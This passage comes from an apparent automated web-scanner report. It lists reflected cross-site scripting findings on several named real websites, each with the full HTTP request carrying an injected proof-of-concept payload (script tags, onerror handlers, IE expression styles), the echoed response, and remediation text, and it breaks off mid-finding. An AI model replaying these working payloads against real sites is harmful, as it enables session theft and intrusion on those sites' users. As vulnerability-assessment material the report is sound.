GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90301ff</script><script>alert(1)</script>e2929316508_None_Network");
</script>
...[SNIP]...

3.102. http://www.myyearbook.com/advertising/default.php [sub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the sub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ba1</script><script>alert(1)</script>6c9fe22fa6a was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network47ba1</script><script>alert(1)</script>6c9fe22fa6a HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web59
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.128

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Network47ba1</script><script>alert(1)</script>6c9fe22fa6a");
</script>
...[SNIP]...

3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.othersonline.com
Path:   /partner/scripts/myyearbook/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload a7303*/alert(1)//69ec540a16f was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/myyearbook/page_parser.js?d=games.myyearbook.coma7303*/alert(1)//69ec540a16f HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cd=false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Cache-control: private
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 21 Jul 2011 18:01:56 GMT
Expires: Thu, 21 Jul 2011 19:01:56 GMT
Last-Modified: Thu, 21 Jul 2011 18:01:56 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: TRP Apache-Coyote/1.1
Set-Cookie: cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:56 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 17452


/*! Copyright 2009,2010 Others Online Inc. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/myyearbook.coma7303*/alert(1)//69ec540a16f/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paloaltonetworks.com
Path:   /cam/switch/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdde1"><script>alert(1)</script>3e7c90a48f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:22 GMT
Connection: Keep-Alive
Content-Length: 8296

<!DOCTYPE html>


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1" title="Facebook" target="_blank">
...[SNIP]...

3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paloaltonetworks.com
Path:   /cam/switch/index.php

Issue detail

The value of the ts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e3d"><script>alert(1)</script>1d3ace0c8b0 was submitted in the ts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:11 GMT
Connection: Keep-Alive
Content-Length: 8287

<!DOCTYPE html>


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0" title="Facebook" target="_blank">
...[SNIP]...

3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df8d"><a>fbb1b57e20d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external5df8d"><a>fbb1b57e20d/ads/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external5df8d%22%3E%3Ca%3Efbb1b57e20d; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:24 GMT;path=/
Content-Length: 20417

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external5df8d"><a>fbb1b57e20d/ads/clo.gif"/>
...[SNIP]...

3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee87a"><script>alert(1)</script>dca7ddc88f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=externalee87a%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:25:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:40:47 GMT;path=/
Content-Length: 20802

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif"/>
...[SNIP]...

3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20110"%20onerror%3dalert(1)%20b0a6ae9eaae was submitted in the REST URL parameter 2. This input was echoed as 20110" onerror=alert(1) b0a6ae9eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /external/ads20110"%20onerror%3dalert(1)%20b0a6ae9eaae/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:17 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:17 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:17 GMT;path=/
Content-Length: 20672

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads20110" Onerror=alert(1) B0a6ae9eaae clo.gif" />
...[SNIP]...

3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff was submitted in the REST URL parameter 2. This input was echoed as a8c41"style="x:expression(alert(1))"ae3298a1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/adsa8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:19 GMT;path=/
Content-Length: 20992

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Adsa8c41"style="x:expression(alert(1))"ae3298a1aff clo.gif" />
...[SNIP]...

3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1 was submitted in the REST URL parameter 2. This input was echoed as b0a12<x style=x:expression(alert(1))>0f286142cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:46 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:46 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:46 GMT;path=/
Content-Length: 20774

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>B0a12<x Style=x:expression(alert(1))>0f286142cd1</strong>
...[SNIP]...

3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fce10<a>d35bf455d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.giffce10<a>d35bf455d71?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:18 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:18 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:18 GMT;path=/
Content-Length: 20658

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.giffce10<a>d35bf455d71 for <strong>
...[SNIP]...

3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb54"><script>alert(1)</script>21b545085de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:58 GMT;path=/
Content-Length: 20756

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de"/>
...[SNIP]...

3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024 was submitted in the REST URL parameter 3. This input was echoed as 2112e"style="x:expression(alert(1))"2aaa2fd7024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/ads/clo.gif2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:02 GMT
Status: 200 OK
